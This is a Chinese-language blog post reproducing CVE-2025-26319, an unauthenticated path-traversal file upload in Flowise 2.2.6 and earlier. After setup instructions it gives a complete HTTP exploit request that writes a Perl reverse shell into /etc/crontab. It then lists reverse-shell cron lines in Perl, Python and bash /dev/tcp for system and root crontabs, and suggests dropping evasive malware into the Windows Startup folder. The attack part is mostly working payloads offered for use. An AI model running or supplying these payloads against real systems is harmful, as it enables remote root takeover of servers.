CVE-2025-26319复现
摘要:记录一下CVE-2025-26319复现过程。
漏洞版本
漏洞版本为: Flowise<=2.2.6
官方库链接: Flowise
环境搭建
该漏洞为非授权任意文件上传漏洞。
下面两种方法都是基于ubuntu 22.04进行搭建的。需要注意的是:通过docker搭建的因为docker环境限制无法复现反弹shell。
方式一-直接搭建
apt-get update
# 安装fnm
apt-get install unzip
curl -o- https://fnm.vercel.app/install | bash
# 通过fnm安装nodejs v22.14.0
fnm install 22
# 安装flowise
npm install -g flowise@2.2.6
# 启动flowise
npx flowise start
方式二-docker搭建
# 安装docker-compose
apt install docker-compose
# 下载flowise安装包
wget wget https://codeload.github.com/FlowiseAI/Flowise/zip/refs/tags/flowise%402.2.6
# 解压flowise安装包
unzip /root/temp/flowise@2.2.6
# 创建docker-compose需要的.env文件
cp -r -a /root/temp/Flowise-flowise-2.2.6/docker/.env.example /root/temp/Flowise-flowise-2.2.6/docker/.env
# 指定使用2.2.6版本docker镜像
# 需要将image: flowiseai/flowise 修改为 image: flowiseai/flowise:2.2.6
nano /root/temp/Flowise-flowise-2.2.6/docker/docker-compose.yml
# 启动docker
cd /root/temp/Flowise-flowise-2.2.6/docker
docker-compose up -d
poc
POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2fetc/./ HTTP/1.1
Host: xxxx.xxxx.xxxx.xxxx
Content-Type: multipart/form-data; boundary=----rpomorn7zgs1dw8jhz
Content-Length: 432
------rpomorn7zgs1dw8jhz
Content-Disposition: form-data; name="files";filename="crontab"
Content-type: text/plain
*/1 * * * * root perl -e 'use Socket; $i="192.168.1.188";$p=443; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/bash -i");};'
------rpomorn7zgs1dw8jhz--
此poc会将反弹shell命令写入linux下的/etc/crontab系统定时任务文件。docker、windows下进行文件上传很难。因为docker下是没有定时任务的。windows下则需要将免杀马上传到C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp文件下,然后等待用户登录?
并且很神奇的是如果文件上传的路径不存在,则会自动创建路径。比如 /api/v1/attachments/..%2f..%2f..%2f..%2f..%2fetc/temp,如果temp路径不存在,则会自动创建。
反弹shell语句记录
(1) 写入/etc/crontab
ubuntu和centos通用。
# 方式一
*/1 * * * * root perl -e 'use Socket; $i="your_server_ip";$p=your_server_port; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/bash -i");};'
# 方式二
*/1 * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your_server_ip",your_server_port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# 方式三
*/1 * * * * root bash -c "bash -i >& /dev/tcp/your_server_ip/your_server_port 0>&1"
(2)写入root用户的定时任务
centos将反弹shell语句写入/var/spool/cron/root。
ubuntu将反弹shell语句写入/var/spool/cron/crontabs/root。
# 方式一
*/1 * * * * perl -e 'use Socket; $i="your_server_ip";$p=your_server_port; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/bash -i");};'
# 方式二
*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your_server_ip",your_server_port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# 方式三
*/1 * * * * bash -c "bash -i >& /dev/tcp/your_server_ip/your_server_port 0>&1"
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。